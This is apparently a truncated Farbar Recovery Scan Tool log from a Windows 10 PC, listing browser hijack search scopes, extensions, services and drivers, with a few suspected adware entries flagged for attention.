hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_daltn_17_43_ssg03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0AtDtC0DyEzz0B0B0AtC0EtCtAyE0A0EtN0D0Tzu0StBtCtBzztN1L2XzutAtFtAyDtFtAtFyDyDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StD0BtByB0B0EtC0BtGyC0AyEyBtGtCyB0FyCtGyDzztDtCtGtAtD0EyBtBtDzztC0DyCzz0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0ByEyBtD0E0BtAtGzy0FtA0FtGyE0ByE0EtGzy0FtA0CtG0A0Azy0CtByEyBzy0EtB0AyD2QtN0A0LzuyE%26cr%3D1491083554%26a%3Dwbf_daltn_17_43_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms} SearchScopes: HKU\S-1-5-21-961552698-412199883-319453439-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_daltn_17_43_ssg03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0AtDtC0DyEzz0B0B0AtC0EtCtAyE0A0EtN0D0Tzu0StBtCtBzztN1L2XzutAtFtAyDtFtAtFyDyDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StD0BtByB0B0EtC0BtGyC0AyEyBtGtCyB0FyCtGyDzztDtCtGtAtD0EyBtBtDzztC0DyCzz0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0ByEyBtD0E0BtAtGzy0FtA0FtGyE0ByE0EtGzy0FtA0CtG0A0Azy0CtByEyBzy0EtB0AyD2QtN0A0LzuyE%26cr%3D1491083554%26a%3Dwbf_daltn_17_43_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms} SearchScopes: HKU\S-1-5-21-961552698-412199883-319453439-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_daltn_17_43_ssg03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0AtDtC0DyEzz0B0B0AtC0EtCtAyE0A0EtN0D0Tzu0StBtCtBzztN1L2XzutAtFtAyDtFtAtFyDyDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StD0BtByB0B0EtC0BtGyC0AyEyBtGtCyB0FyCtGyDzztDtCtGtAtD0EyBtBtDzztC0DyCzz0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0ByEyBtD0E0BtAtGzy0FtA0FtGyE0ByE0EtGzy0FtA0CtG0A0Azy0CtByEyBzy0EtB0AyD2QtN0A0LzuyE%26cr%3D1491083554%26a%3Dwbf_daltn_17_43_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms} BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2019-05-24] (Microsoft Corporation -> Microsoft Corporation) BHO: YoutubeAdBlock -> {68568C83-AE1A-4F44-9CFD-054ECDF0B7AB} -> C:\Program Files (x86)\RiWpAbLxdIE\tWbgYGMV7.dll [2019-07-04] () [File not signed] BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_211\bin\ssv.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation) BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2019-06-04] (McAfee, LLC -> McAfee, Inc.) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2019-05-24] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: YoutubeAdBlock -> {68568C83-AE1A-4F44-9CFD-054ECDF0B7AB} -> C:\Program Files (x86)\RiWpAbLxdIE\kbOI25Rua.dll [2019-07-04] () [File not signed] BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2019-06-04] (McAfee, LLC -> McAfee, Inc.) BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2019-04-18] (McAfee, Inc. -> McAfee, Inc.) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2019-04-18] (McAfee, Inc. -> McAfee, Inc.) FireFox: ======== FF DefaultProfile: uv0ur82u.default FF ProfilePath: C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\uv0ur82u.default [2019-07-04] FF ProfilePath: C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release [2019-07-04] FF user.js: detected! => C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\user.js [2019-07-04] FF Extension: (Facebook Container) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\@contain-facebook.xpi [2019-07-04] FF Extension: (Flash Video Downloader) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\ductloanphuok@gmail.com.xpi [2019-07-04] FF Extension: (app.telemetry Page Speed Monitor) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\jid0-OqxcSY9VMeMm8jJqJYy5KM0nmS8@jetpack.xpi [2019-07-04] FF Extension: (To Google Translate) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\jid1-93WyvpgvxzGATw@jetpack.xpi [2019-07-04] FF Extension: (YouTube™ Flash® Player) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\jid1-HAV2inXAnQPIeA@jetpack.xpi [2019-07-04] FF Extension: (clean-youtube) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\jid1-q4sG8pYhq8KGHs@jetpack.xpi [2019-07-04] FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\jid1-ZAdIEUB7XOzOJw@jetpack.xpi [2019-07-04] FF Extension: (Download Manager (S3)) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\s3download@statusbar.xpi [2019-07-04] FF Extension: (Avast Online Security) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\wrc@avast.com.xpi [2019-07-04] FF Extension: (Bitwarden - Free Password Manager) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\{446900e4-71c2-419f-a6a7-df9c091e268b}.xpi [2019-07-04] FF Extension: (Tab Auto Refresh) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-07-04] FF Extension: (Feedbro) - C:\Users\virk_ps\AppData\Roaming\Mozilla\Firefox\Profiles\m50ip1vk.default-release\Extensions\{a9c2ad37-e940-4892-8dce-cd73c6cbbc0c}.xpi [2019-07-04] FF Extension: (Google Access Offline) - C:\Program Files\Mozilla Firefox\browser\features\{B71C07BC-2895-4102-B7F0-99C34270DC48}.xpi [2019-07-04] [not signed] FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2019-06-04] FF HKLM\...\Firefox\Extensions: [{EF0645D5-78D6-4B33-BC45-95B1874977AF}] - C:\Program Files\McAfee\WebAdvisor\e10swbffplg.xpi FF Extension: (McAfee® Web Boost) - C:\Program Files\McAfee\WebAdvisor\e10swbffplg.xpi [2019-06-04] FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi FF HKLM-x32\...\Firefox\Extensions: [{EF0645D5-78D6-4B33-BC45-95B1874977AF}] - C:\Program Files\McAfee\WebAdvisor\e10swbffplg.xpi FF Plugin: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2019-04-18] (McAfee, Inc. -> ) FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2019-04-18] (McAfee, Inc. -> ) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-05-15] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Reader 5\npnitromozilla.dll [2016-08-02] (Nitro Software, Inc. -> Nitro PDF) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.7\npGoogleUpdate3.dll [2019-07-03] (Google Inc -> Google LLC) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.7\npGoogleUpdate3.dll [2019-07-03] (Google Inc -> Google LLC) FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.2.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) Chrome: ======= CHR Profile: C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default [2019-07-04] CHR Extension: (Slides) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-07-03] CHR Extension: (Docs) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-07-03] CHR Extension: (Google Drive) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-07-03] CHR Extension: (YouTube) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-07-03] CHR Extension: (Google Sheets Offline) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\eedfomkagfkmleinnllkbldagompmpmk [2019-07-04] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION CHR Extension: (Hermes Tab) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehlceeijggpdgfcefmipcmdelickjgfg [2019-07-03] CHR Extension: (Sheets) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-07-03] CHR Extension: (McAfee® WebAdvisor) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-07-03] CHR Extension: (Google Docs Offline) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-07-03] CHR Extension: (McAfee® Web Boost) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\klekeajafkkpokaofllcadenjdckhinm [2019-07-03] CHR Extension: (Chrome Web Store Payments) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-07-03] CHR Extension: (Gmail) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-07-03] CHR Extension: (Chrome Media Router) - C:\Users\virk_ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-07-03] CHR HKLM-x32\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [klekeajafkkpokaofllcadenjdckhinm] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 Cadence License Manager; C:\Cadence\LicenseManager\lmgrd.exe [1998304 2015-10-29] (Flexera Software LLC -> Flexera Software LLC) R2 hasplms; C:\WINDOWS\system32\hasplms.exe [4608320 2014-11-27] (SafeNet, Inc. -> SafeNet Inc.) R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [337888 2016-05-03] (Intel(R) pGFX -> Intel Corporation) R2 lkClassAds; C:\WINDOWS\SysWOW64\lkads.exe [69096 2018-03-13] (National Instruments Corporation -> National Instruments Corporation) R2 lkTimeSync; C:\WINDOWS\SysWOW64\lktsrv.exe [80880 2018-03-13] (National Instruments Corporation -> National Instruments Corporation) R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [899264 2019-06-04] (McAfee, LLC -> McAfee, Inc.) R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_19_3\McApExe.exe [745880 2019-04-23] (McAfee, Inc. -> McAfee, Inc.) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\3.1.233.0\\McCSPServiceHost.exe [2225104 2019-03-29] (McAfee, Inc. -> McAfee, Inc.) S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe [374400 2019-03-06] (McAfee, Inc. -> McAfee, LLC) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [608896 2019-03-06] (McAfee, Inc. -> McAfee, LLC) R3 mfevtp; C:\WINDOWS\system32\mfevtps.exe [526224 2019-03-06] (McAfee, Inc. -> McAfee, LLC) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1698768 2019-04-01] (McAfee, Inc. -> McAfee, Inc.) S2 MSSQL$CITADEL; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.CITADEL\MSSQL\Binn\sqlservr.exe [43040096 2011-06-17] (Microsoft Corporation -> Microsoft Corporation) R2 mxssvr; C:\Program Files (x86)\National Instruments\MAX\nimxs.exe [103872 2018-02-26] (National Instruments Corporation -> National Instruments Corporation) R2 MySQL57; C:\Program Files\MySQL\MySQL Server 5.7\bin\mysqld.exe [39918080 2016-11-28] () [File not signed] R2 NIApplicationWebServer; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [65096 2016-12-08] (National Instruments Corporation -> National Instruments Corporation) S4 NIApplicationWebServer64; C:\Program Files\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [83528 2016-12-08] (National Instruments Corporation -> National Instruments Corporation) R2 niauth; C:\Program Files (x86)\National Instruments\Shared\niauth\niauth_daemon.exe [594984 2017-02-16] (National Instruments Corporation -> National Instruments Corporation) R2 NICitadel5Service; C:\WINDOWS\SysWOW64\nicitdl5.exe [1392088 2017-03-13] (National Instruments Corporation -> National Instruments Corporation) R2 nidevldu; C:\WINDOWS\SysWOW64\nidevldu.exe [289320 2017-11-30] (National Instruments Corporation -> National Instruments Corporation) R2 NIDomainService; C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe [432600 2018-03-13] (National Instruments Corporation -> National Instruments Corporation) R2 niLXIDiscovery; C:\Program Files (x86)\National Instruments\Shared\NI-VISA\niLxiDiscovery.exe [537144 2018-09-25] (National Instruments Corporation -> National Instruments Corporation) R2 nimDNSResponder; C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [343080 2017-03-08] (National Instruments Corporation -> National Instruments Corporation) R2 NINetworkDiscovery; C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe [189512 2018-03-05] (National Instruments Corporation -> National Instruments Corporation) R3 NIOPCServersKeySvcV2016; C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\keysvc.exe [36976 2016-01-08] (Kepware Technologies -> Kepware Technologies) R2 NIOPCServersLoggerV2016; C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\server_eventlog.exe [156784 2016-01-08] (Kepware Technologies -> Kepware Technologies) R2 NIOPCServersV2016; C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\server_runtime.exe [301168 2016-01-08] (Kepware Technologies -> Kepware Technologies) R2 nipxicmsvc; C:\Program Files (x86)\National Instruments\PXI\nipxicms.exe [204312 2018-09-25] (National Instruments Corporation -> National Instruments Corporation) R2 nipxirmu; C:\WINDOWS\SysWOW64\nipxism.exe [33256 2018-09-18] (National Instruments Corporation -> National Instruments Corporation) S3 NiRioRpc; C:\WINDOWS\SysWOW64\NiRioRpc.exe [50120 2017-03-20] (National Instruments Corporation -> National Instruments Corporation) R2 niroco; C:\Program Files\National Instruments\Shared\roco\niroco.exe [700968 2018-09-14] (National Instruments Corporation -> National Instruments Corporation) R2 nisds; C:\Program Files\National Instruments\Shared\Sync Domain\nisds.exe [34280 2017-11-20] (National Instruments Corporation -> National Instruments Corporation) R2 NiSvcLoc; C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe [110040 2017-11-08] (National Instruments Corporation -> National Instruments Corporation) R2 NISystemWebServer; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe [65080 2016-12-08] (National Instruments Corporation -> National Instruments Corporation) R2 NITaggerService; C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe [760280 2017-03-19] (National Instruments Corporation -> National Instruments Corporation) R2 NitroReaderDriverReadSpool5; C:\Program Files\Nitro\Reader 5\NitroPDFReaderDriverService5x64.exe [327328 2016-08-02] (Nitro Software, Inc. -> Nitro Software, Inc.) R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [1360384 2019-02-22] (McAfee, Inc. -> McAfee, Inc.) S3 Portmap; C:\WINDOWS\SysWOW64\portmap.exe [40960 1999-01-18] () [File not signed] S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.) R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5773384 2019-07-04] (Microsoft Windows Publisher -> Microsoft Corporation) S4 SQLAgent$CITADEL; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.CITADEL\MSSQL\Binn\SQLAGENT.EXE [370016 2011-06-17] (Microsoft Corporation -> Microsoft Corporation) S3 sshd; C:\WINDOWS\System32\OpenSSH\sshd.exe [974848 2019-07-04] (Microsoft Windows -> ) S3 SshdBroker; C:\WINDOWS\System32\SshdBroker.dll [290816 2019-07-04] (Microsoft Windows -> Microsoft Corporation) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-28] (Synaptics Incorporated -> Synaptics Incorporated) R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11814232 2019-06-05] (TeamViewer GmbH -> TeamViewer GmbH) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4098056 2019-03-19] (Microsoft Corporation -> Microsoft Corporation) R2 WIFIService; C:\ProgramData\WIFIService\WIFIService.exe [243416 2019-06-24] (Xebiro Limited -> ) <==== ATTENTION S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [113992 2019-03-19] (Microsoft Corporation -> Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 athr; C:\WINDOWS\System32\drivers\athw8x.sys [4233728 2019-03-19] (Microsoft Windows -> Qualcomm Atheros Communications, Inc.) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [77360 2019-04-23] (McAfee, Inc. -> McAfee, LLC) S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [33448 2016-12-07] (CHENGDU YIWO Tech Development Co., Ltd. -> ) R0 EPMVolFlt; C:\WINDOWS\System32\drivers\EPMVolFlt.sys [30320 2017-11-23] (CHENGDU YIWO Tech Development Co., Ltd. -> Windows (R) Codename Longhorn DDK provider) S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10848 2016-07-11] (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] R2 hardlock; C:\WINDOWS\system32\drivers\hardlock.sys [331608 2014-11-27] (SafeNet, Inc. -> SafeNet Inc.) S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [226992 2019-04-18] (McAfee, Inc. -> McAfee, Inc.) R3 kmloop; C:\WINDOWS\System32\drivers\loop.sys [17408 2019-03-19] (Microsoft Windows -> Microsoft Corporation) S3 lvalarmk; C:\WINDOWS\System32\drivers\lvalarmk.sys [44792 2017-10-05] (National Instruments Corporation -> National Instruments Corporation) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [514608 2019-04-23] (McAfee, Inc. -> McAfee, LLC) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [377392 2019-04-23] (McAfee, Inc. -> McAfee, LLC) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [86144 2019-04-23] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [518192 2019-04-23] (McAfee, Inc. -> McAfee, LLC) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [985648 2019-04-23] (McAfee, Inc. -> McAfee, LLC) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [565288 2019-04-23] (McAfee, Inc. -> McAfee LLC.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [109096 2019-04-23] (McAfee, Inc. -> McAfee LLC.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [117808 2019-04-23] (McAfee, Inc. -> McAfee, LLC) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [254000 2019-04-23] (McAfee, Inc. -> McAfee, LLC) S3 nicdcck; C:\WINDOWS\System32\drivers\nicdcckl.sys [30816 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nicdrk; C:\WINDOWS\System32\drivers\nicdrkl.sys [30816 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nicmrk; C:\WINDOWS\System32\drivers\nicmrkl.sys [30856 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nicondrk; C:\WINDOWS\System32\drivers\nicondrkl.sys [30784 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nicsrk; C:\WINDOWS\System32\drivers\nicsrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R3 nidimk; C:\WINDOWS\System32\drivers\nidimkl.sys [31456 2018-09-17] (National Instruments Corporation -> National Instruments Corporation) S3 nidmxfk; C:\WINDOWS\System32\drivers\nidmxfkl.sys [30784 2017-12-06] (National Instruments Corporation -> National Instruments Corporation) S3 nidsark; C:\WINDOWS\System32\drivers\nidsarkl.sys [30808 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 niemrk; C:\WINDOWS\System32\drivers\niemrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 niesrk; C:\WINDOWS\System32\drivers\niesrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R3 NIEthernetDeviceEnumerator; C:\WINDOWS\System32\drivers\niede.sys [40720 2017-03-22] (National Instruments Corporation -> National Instruments Corporation) S3 nifdrk; C:\WINDOWS\System32\drivers\nifdrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nifslk; C:\WINDOWS\System32\drivers\nifslkl.sys [30816 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R3 nigevwrapper; C:\WINDOWS\system32\DRIVERS\nigevwrapper.sys [123112 2016-10-12] (National Instruments Corporation -> National Instruments Corporation) S3 nihorbrk; C:\WINDOWS\System32\drivers\nihorbrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R3 niimaqdxk; C:\WINDOWS\System32\drivers\niimaqdxkl.sys [31824 2017-03-25] (National Instruments Corporation -> National Instruments Corporation) S3 nilmsk; C:\WINDOWS\System32\drivers\nilmskl.sys [30904 2017-12-06] (National Instruments Corporation -> National Instruments Corporation) R3 nimdbgk; C:\WINDOWS\System32\drivers\nimdbgkl.sys [31248 2018-09-14] (National Instruments Corporation -> National Instruments Corporation) R3 nimru2k; C:\WINDOWS\System32\drivers\nimru2kl.sys [31464 2018-09-17] (National Instruments Corporation -> National Instruments Corporation) S3 nimsdrk; C:\WINDOWS\System32\drivers\nimsdrkl.sys [30920 2017-05-17] (National Instruments Corporation -> National Instruments Corporation) S3 nimstsk; C:\WINDOWS\System32\drivers\nimstskl.sys [15200 2017-02-09] (National Instruments Corporation -> National Instruments Corporation) R3 nimxdfk; C:\WINDOWS\System32\drivers\nimxdfkl.sys [31416 2018-09-14] (National Instruments Corporation -> National Instruments Corporation) S3 nimxpk; C:\WINDOWS\System32\drivers\nimxpkl.sys [15176 2017-02-08] (National Instruments Corporation -> National Instruments Corporation) S3 ninshsdk; C:\WINDOWS\System32\drivers\ninshsdkl.sys [15200 2015-01-27] (National Instruments Corporation -> National 